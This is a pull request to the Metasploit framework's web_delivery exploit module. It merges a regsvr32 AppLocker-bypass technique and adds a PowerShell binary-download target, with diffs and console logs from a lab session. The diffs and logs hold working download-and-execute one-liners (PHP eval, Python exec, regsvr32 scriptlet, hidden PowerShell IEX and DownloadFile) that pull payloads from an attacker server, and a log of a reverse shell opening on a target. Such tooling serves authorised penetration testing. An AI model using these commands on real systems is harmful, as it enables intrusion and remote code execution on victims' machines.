### PR TITLE
Web_Delivery - Merge regsvr32_applocker_bypass_server & Add PSH(Binary)

### DIFF
--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -139,7 +139,7 @@ Gem::Specification.new do |spec|
   # Library for Generating Randomized strings valid as Identifiers such as variable names
   spec.add_runtime_dependency 'rex-random_identifier'
   # library for creating Powershell scripts for exploitation purposes
-  spec.add_runtime_dependency 'rex-powershell', ["< 0.1.73"]
+  spec.add_runtime_dependency 'rex-powershell', ["< 0.1.78"]
   # Library for processing and creating Zip compatbile archives
   spec.add_runtime_dependency 'rex-zip'
   # Library for parsing offline Windows Registry files

--- a/modules/exploits/multi/script/web_delivery.rb
+++ b/modules/exploits/multi/script/web_delivery.rb
@@ -8,6 +8,7 @@ require 'msf/core/exploit/powershell'
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ManualRanking
 
+  include Msf::Exploit::EXE
   include Msf::Exploit::Powershell
   include Msf::Exploit::Remote::HttpServer
 
@@ -31,6 +32,8 @@ class MetasploitModule < Msf::Exploit::Remote
         The signed Microsoft binary file, Regsvr32, is able to request an .sct file and then execute the included
         PowerShell command inside of it. Both web requests (i.e., the .sct file and PowerShell download/execute)
         can occur on the same port.
+
+        "PSH (Binary)" will write a file to the disk, allowing for custom binaries to be served up to be downloaded/executed.
       ),
       'License'      => MSF_LICENSE,
       'Author'       =>
@@ -40,6 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'Chris Campbell', # @obscuresec - Inspiration n.b. no relation!
           'Casey Smith',    # AppLocker bypass research and vulnerability discovery (@subTee)
           'Trenton Ivey',   # AppLocker MSF Module (kn0)
+          'g0tmi1k',        # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features
         ],
       'DefaultOptions' =>
         {
@@ -71,6 +75,10 @@ class MetasploitModule < Msf::Exploit::Remote
           ['Regsvr32', {
             'Platform' => 'win',
             'Arch' => [ARCH_X86, ARCH_X64]
+          }],
+          ['PSH (Binary)', {
+            'Platform' => 'win',
+            'Arch' => [ARCH_X86, ARCH_X64]
           }]
         ],
       'DefaultTarget'  => 0,
@@ -79,32 +87,43 @@ class MetasploitModule < Msf::Exploit::Remote
 
   register_advanced_options(
     [
-      OptBool.new('PSH-Proxy', [ true, 'PowerShell - Use the system proxy', true ])
+      OptBool.new('PSH-Proxy',            [ true,  'PSH - Use the system proxy', true ]),
+      OptString.new('PSHBinary-PATH',     [ false, 'PSH (Binary) - The folder to store the file on the target machine (Will be %TEMP% if left blank)', '' ]),
+      OptString.new('PSHBinary-FILENAME', [ false, 'PSH (Binary) - The filename to use (Will be random if left blank)', '' ]),
     ], self.class
   )
   end
 
 
   def primer
-    url = get_uri
+    php = %Q(php -d allow_url_fopen=true -r "eval(file_get_contents('#{get_uri}'));")
+    python = %Q(python -c "import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{get_uri}');exec(r.read());")
+    regsvr = %Q(regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll)
+
     print_status("Run the following command on the target machine:")
     case target.name
     when 'PHP'
-      print_line(%Q(php -d allow_url_fopen=true -r "eval(file_get_contents('#{url}'));"))
+      print_line("#{php}")
     when 'Python'
-      print_line(%Q(python -c "import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{url}');exec(r.read());"))
+      print_line("#{python}")
     when 'PSH'
-      print_line(gen_psh(url))
+      psh = gen_psh("#{get_uri}", "string")
+      print_line("#{psh}")
     when 'Regsvr32'
-      print_line("regsvr32 /s /n /u /i:#{url}.sct scrobj.dll")
+      print_line("#{regsvr}")
+    when 'PSH (Binary)'
+      psh = gen_psh("#{get_uri}", "download")
+      print_line("#{psh}")
     end
   end
 
 
   def on_request_uri(cli, _request)
     if _request.raw_uri =~ /\.sct$/
-      psh = gen_psh(get_uri)
+      psh = gen_psh("#{get_uri}", "string")
       data = gen_sct_file(psh)
+    elsif target.name.include? 'PSH (Binary)'
+      data = generate_payload_exe
     elsif target.name.include? 'PSH' or target.name.include? 'Regsvr32'
       data = cmd_psh_payload(payload.encoded,
                              payload_instance.arch.first,
@@ -125,10 +144,34 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
 
-  def gen_psh(url)
+  def gen_psh(url, *method)
       ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
-      download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))
-      download_and_run = "#{ignore_cert}#{download_string}"
+
+      if method.include? 'string'
+        download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))
+        download_and_run = "#{ignore_cert}#{download_string}"
+      else
+        # Random filename to use, if there isn't anything set
+        random = "#{rand_text_alphanumeric 8}.exe"
+
+        # Set filename (Use random filename if empty)
+        filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME']
+
+        # Set path (Use %TEMP% if empty)
+        path = datastore['BinaryEXE-PATH'].blank? ? "$env:temp" : %Q('#{datastore['BinaryEXE-PATH']}')
+
+        # Join Path and Filename
+        file = %Q(echo (#{path}+'\\#{filename}'))
+
+        # Generate download PowerShell command
+        #download_string = Rex::Powershell::PshMethods.download(url, "$z")  # Can't use, due to single vs double quotes in the URL
+        download_string = %Q^(new-object System.Net.WebClient).DownloadFile('#{url}', "$z")^
+
+        # Join PowerShell commands up
+        download_and_run = "$z=#{file};#{ignore_cert}#{download_string};invoke-item $z"
+      end
+
+      # Generate main PowerShell command
       return generate_psh_command_line(noprofile: true,
                                        windowstyle: 'hidden',
                                        command: download_and_run

--- a/modules/exploits/multi/script/web_delivery.rb
+++ b/modules/exploits/multi/script/web_delivery.rb
@@ -62,6 +62,12 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Jul 19 2013'
     ))
+
+  register_advanced_options(
+    [
+      OptBool.new('PSH-Proxy', [ true, 'PowerShell - Use the system proxy', true ])
+    ], self.class
+  )
   end
 
   def on_request_uri(cli, _request)
@@ -89,7 +95,7 @@ class MetasploitModule < Msf::Exploit::Remote
       print_line("python -c \"import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{url}');exec(r.read());\"")
     when 'PSH'
       ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
-      download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)
+      download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))
       download_and_run = "#{ignore_cert}#{download_string}"
       print_line generate_psh_command_line(
                                              noprofile: true,

--- a/modules/exploits/multi/script/web_delivery.rb
+++ b/modules/exploits/multi/script/web_delivery.rb
@@ -149,7 +149,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
       if method.include? 'string'
         download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))
-        download_and_run = "#{ignore_cert}#{download_string}"
       else
         # Random filename to use, if there isn't anything set
         random = "#{rand_text_alphanumeric 8}.exe"
@@ -164,12 +163,10 @@ class MetasploitModule < Msf::Exploit::Remote
         file = %Q(echo (#{path}+'\\#{filename}'))
 
         # Generate download PowerShell command
-        #download_string = Rex::Powershell::PshMethods.download(url, "$z")  # Can't use, due to single vs double quotes in the URL
-        download_string = %Q^(new-object System.Net.WebClient).DownloadFile('#{url}', "$z")^
-
-        # Join PowerShell commands up
-        download_and_run = "$z=#{file};#{ignore_cert}#{download_string};invoke-item $z"
+        download_string = Rex::Powershell::PshMethods.download_run(url, file})
       end
+
+      download_and_run = "#{ignore_cert}#{download_string}"
 
       # Generate main PowerShell command
       return generate_psh_command_line(noprofile: true,

--- a/modules/exploits/multi/script/web_delivery.rb
+++ b/modules/exploits/multi/script/web_delivery.rb
@@ -15,22 +15,31 @@ class MetasploitModule < Msf::Exploit::Remote
     super(update_info(info,
       'Name'         => 'Script Web Delivery',
       'Description'  => %q(
-        This module quickly fires up a web server that serves a payload.
-        The provided command will start the specified scripting language interpreter and then download and execute the
-        payload. The main purpose of this module is to quickly establish a session on a target
-        machine when the attacker has to manually type in the command himself, e.g. Command Injection,
-        RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not
-        write to disk so it is less likely to trigger AV solutions and will allow privilege
-        escalations supplied by Meterpreter. When using either of the PSH targets, ensure the
-        payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute
-        x86 payloads on x64 machines.
+           This module quickly fires up a web server that serves a payload.
+        The provided command which will allow for a payload to download and execute.
+        It will do it either specified scripting language interpreter or "squiblydoo" via regsvr32.exe
+        for bypassing application whitelisting. The main purpose of this module is to quickly establish
+        a session on a target machine when the attacker has to manually type in the command:
+        e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Execution.
+        This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege
+        escalations supplied by Meterpreter.
+
+        When using either of the PSH targets, ensure the payload architecture matches the target computer
+        or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines.
+
+        Regsvr32 uses "squiblydoo" technique for bypassing application whitelisting.
+        The signed Microsoft binary file, Regsvr32, is able to request an .sct file and then execute the included
+        PowerShell command inside of it. Both web requests (i.e., the .sct file and PowerShell download/execute)
+        can occur on the same port.
       ),
       'License'      => MSF_LICENSE,
       'Author'       =>
         [
           'Andrew Smith "jakx" <jakx.ppr@gmail.com>',
           'Ben Campbell',
-          'Chris Campbell' # @obscuresec - Inspiration n.b. no relation!
+          'Chris Campbell', # @obscuresec - Inspiration n.b. no relation!
+          'Casey Smith',    # AppLocker bypass research and vulnerability discovery (@subTee)
+          'Trenton Ivey',   # AppLocker MSF Module (kn0)
         ],
       'DefaultOptions' =>
         {
@@ -41,7 +50,8 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'],
           ['URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/'],
           ['URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'],
-          ['URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html']
+          ['URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'],
+          ['URL', 'http://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html'],
         ],
       'Platform'       => %w(python php win),
       'Targets'        =>
@@ -55,6 +65,10 @@ class MetasploitModule < Msf::Exploit::Remote
             'Arch' => ARCH_PHP
           }],
           ['PSH', {
+            'Platform' => 'win',
+            'Arch' => [ARCH_X86, ARCH_X64]
+          }],
+          ['Regsvr32', {
             'Platform' => 'win',
             'Arch' => [ARCH_X86, ARCH_X64]
           }]
@@ -71,15 +85,21 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def on_request_uri(cli, _request)
-    print_status('Delivering Payload')
-    if target.name.include? 'PSH'
+    if _request.raw_uri =~ /\.sct$/
+      print_status("Handling .sct Request")
+      psh = gen_psh(get_uri)
+      data = gen_sct_file(psh)
+      send_response(cli, data, 'Content-Type' => 'text/plain')
+    elsif target.name.include? 'PSH' or target.name.include? 'Regsvr32'
+      print_status("Delivering Payload")
       data = cmd_psh_payload(payload.encoded,
                              payload_instance.arch.first,
                              remove_comspec: true,
                              exec_in_place: true
                            )
     else
-      data = %Q(#{payload.encoded} )
+      print_status("Delivering Payload")
+      data = %Q(#{payload.encoded})
     end
     send_response(cli, data,  'Content-Type' => 'application/octet-stream')
   end
@@ -94,14 +114,33 @@ class MetasploitModule < Msf::Exploit::Remote
       print_line('Python:')
       print_line("python -c \"import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{url}');exec(r.read());\"")
     when 'PSH'
+      print_line gen_psh(url)
+    when 'Regsvr32'
+      print_line("regsvr32 /s /n /u /i:#{url}.sct scrobj.dll")
+    end
+  end
+
+
+  def gen_psh(url)
       ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
       download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))
       download_and_run = "#{ignore_cert}#{download_string}"
       print_line generate_psh_command_line(
+      return generate_psh_command_line(
                                              noprofile: true,
                                              windowstyle: 'hidden',
                                              command: download_and_run
                                            )
     end
+  end
+
+
+  def rand_class_id
+    "#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}"
+  end
+
+
+  def gen_sct_file(command)
+    %{<?XML version="1.0"?><scriptlet><registration progid="#{rand_text_alphanumeric 8}" classid="{#{rand_class_id}}"><script><![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("#{command}",0);]]></script></registration></scriptlet>}
   end
 end

--- a/modules/exploits/multi/script/web_delivery.rb
+++ b/modules/exploits/multi/script/web_delivery.rb
@@ -47,11 +47,11 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'References'     =>
         [
-          ['URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'],
-          ['URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/'],
+          ['URL', 'https://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'],
+          ['URL', 'https://www.pentestgeek.com/2013/07/19/invoke-shellcode/'],
           ['URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'],
-          ['URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'],
-          ['URL', 'http://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html'],
+          ['URL', 'https://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'],
+          ['URL', 'https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html'],
         ],
       'Platform'       => %w(python php win),
       'Targets'        =>
@@ -84,39 +84,43 @@ class MetasploitModule < Msf::Exploit::Remote
   )
   end
 
+
+  def primer
+    url = get_uri
+    print_status("Run the following command on the target machine:")
+    case target.name
+    when 'PHP'
+      print_line(%Q(php -d allow_url_fopen=true -r "eval(file_get_contents('#{url}'));"))
+    when 'Python'
+      print_line(%Q(python -c "import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{url}');exec(r.read());"))
+    when 'PSH'
+      print_line(gen_psh(url))
+    when 'Regsvr32'
+      print_line("regsvr32 /s /n /u /i:#{url}.sct scrobj.dll")
+    end
+  end
+
+
   def on_request_uri(cli, _request)
     if _request.raw_uri =~ /\.sct$/
-      print_status("Handling .sct Request")
       psh = gen_psh(get_uri)
       data = gen_sct_file(psh)
-      send_response(cli, data, 'Content-Type' => 'text/plain')
     elsif target.name.include? 'PSH' or target.name.include? 'Regsvr32'
-      print_status("Delivering Payload")
       data = cmd_psh_payload(payload.encoded,
                              payload_instance.arch.first,
                              remove_comspec: true,
                              exec_in_place: true
                            )
     else
-      print_status("Delivering Payload")
       data = %Q(#{payload.encoded})
     end
-    send_response(cli, data,  'Content-Type' => 'application/octet-stream')
-  end
 
-  def primer
-    url = get_uri
-    print_status('Run the following command on the target machine:')
-    case target.name
-    when 'PHP'
-      print_line("php -d allow_url_fopen=true -r \"eval(file_get_contents('#{url}'));\"")
-    when 'Python'
-      print_line('Python:')
-      print_line("python -c \"import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{url}');exec(r.read());\"")
-    when 'PSH'
-      print_line gen_psh(url)
-    when 'Regsvr32'
-      print_line("regsvr32 /s /n /u /i:#{url}.sct scrobj.dll")
+    if _request.raw_uri =~ /\.sct$/
+      print_status("Handling .sct Request")
+      send_response(cli, data, 'Content-Type' => 'text/plain')
+    else
+      print_status("Delivering Payload")
+      send_response(cli, data, 'Content-Type' => 'application/octet-stream')
     end
   end
 
@@ -125,13 +129,10 @@ class MetasploitModule < Msf::Exploit::Remote
       ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
       download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))
       download_and_run = "#{ignore_cert}#{download_string}"
-      print_line generate_psh_command_line(
-      return generate_psh_command_line(
-                                             noprofile: true,
-                                             windowstyle: 'hidden',
-                                             command: download_and_run
-                                           )
-    end
+      return generate_psh_command_line(noprofile: true,
+                                       windowstyle: 'hidden',
+                                       command: download_and_run
+                                     )
   end
 
 

--- a/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb
+++ b/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb
@@ -8,6 +8,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Powershell
   include Msf::Exploit::Remote::HttpServer
+  include Msf::Module::Deprecated
+
+  deprecated(Date.new(2018, 3, 5), 'exploits/multi/script/web_delivery.rb')
 
   def initialize(info = {})
     super(update_info(info,


### PR DESCRIPTION
- Merge in module `exploits/windows/misc/regsvr32_applocker_bypass_server.rb` as it performs in the same manner as web_delivery.rb
- Add a new target `PSH (Binary)` to allows `EXE::Custom` option to be set.
- Add proxy removal option for PowerShell command output

- - -

## Regsvr32 

...aka `exploits/windows/misc/regsvr32_applocker_bypass_server.rb` (https://github.com/rapid7/metasploit-framework/blob/6300758c46464ff5488bc49bc326ebbb1df46321/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb)

```
root@kali:~/metasploit-framework# rm /root/.msf4/config 
root@kali:~/metasploit-framework# ./msfconsole -q
msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 3
target => 3
msf exploit(web_delivery) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(web_delivery) > set lhost 192.168.103.180
lhost => 192.168.103.180
msf exploit(web_delivery) > options 

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.103.180  yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   3   Regsvr32


msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.103.180:4444 
[*] Using URL: http://0.0.0.0:8080/ri7pXHZDb
[*] Local IP: http://192.168.103.180:8080/ri7pXHZDb
[*] Server started.
[*] Run the following command on the target machine:
regsvr32 /s /n /u /i:http://192.168.103.180:8080/ri7pXHZDb.sct scrobj.dll
msf exploit(web_delivery) >



C:\Users\lab>regsvr32 /s /n /u /i:http://192.168.103.180:8080/ri7pXHZDb.sct scrobj.dll
C:\Users\lab>



msf exploit(web_delivery) > [*] 192.168.103.128  web_delivery - Handling .sct Request
[*] 192.168.103.128  web_delivery - Delivering Payload
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.103.128
[*] Command shell session 1 opened (192.168.103.180:4444 -> 192.168.103.128:1156) at 2017-09-07 04:32:44 -0400

msf exploit(web_delivery) > 
```

- - - 

## PSH (Binary)

New target option.

```
msf exploit(web_delivery) > set target 4
target => 4
msf exploit(web_delivery) > set disablepayloadhandler true
disablepayloadhandler => true
msf exploit(web_delivery) > set exe::custom /usr/share/windows-binaries/nc.exe 
exe::custom => /usr/share/windows-binaries/nc.exe
msf exploit(web_delivery) > jobs -K
Stopping all jobs...

[*] Server stopped.
msf exploit(web_delivery) > options 

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.103.180  yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   4   PSH (Binary)


msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Using URL: http://0.0.0.0:8080/ebuEMq9lcj
[*] Local IP: http://192.168.103.180:8080/ebuEMq9lcj
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $z=echo ($env:temp+'\2fGt1V9k.exe');(new-object System.Net.WebClient).DownloadFile('http://192.168.103.180:8080/ebuEMq9lcj', "$z");invoke-item $z
msf exploit(web_delivery) > 



C:\Users\lab>powershell.exe -nop -w hidden -c $z=echo ($env:temp+'\2fGt1V9k.exe');(new-object System.Net.WebClient).DownloadFile('http://192.168.103.180:8080/ebuEMq9lcj', "$z");invoke-item $z
*Closes*



msf exploit(web_delivery) > [*] 192.168.103.128  web_delivery - Using custom payload /usr/share/windows-binaries/nc.exe, RHOST and RPORT settings will be ignored!
[*] 192.168.103.128  web_delivery - Delivering Payload

msf exploit(web_delivery) > 



* New window opens on the Windows machine _Netcat prompt_*
Cmd Line: 
```


- - -

## Proxy Removal

Makes the powershell command command small

```
msf exploit(web_delivery) > set target 2
target => 2
msf exploit(web_delivery) > options 

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.103.180  yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   2   PSH


msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Using URL: http://0.0.0.0:8080/YmpUF2sEyAkX
[*] Local IP: http://192.168.103.180:8080/YmpUF2sEyAkX
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $Z=new-object net.webclient;$Z.proxy=[Net.WebRequest]::GetSystemWebProxy();$Z.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $Z.downloadstring('http://192.168.103.180:8080/YmpUF2sEyAkX');
msf exploit(web_delivery) > jobs -K
Stopping all jobs...
[*] Server stopped.
msf exploit(web_delivery) > set PSH-PROXY false
PSH-PROXY => false
msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Using URL: http://0.0.0.0:8080/MwbbyT3pqD
[*] Local IP: http://192.168.103.180:8080/MwbbyT3pqD
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c  IEX ((new-object net.webclient).downloadstring('http://192.168.103.180:8080/MwbbyT3pqD'))
msf exploit(web_delivery) >
```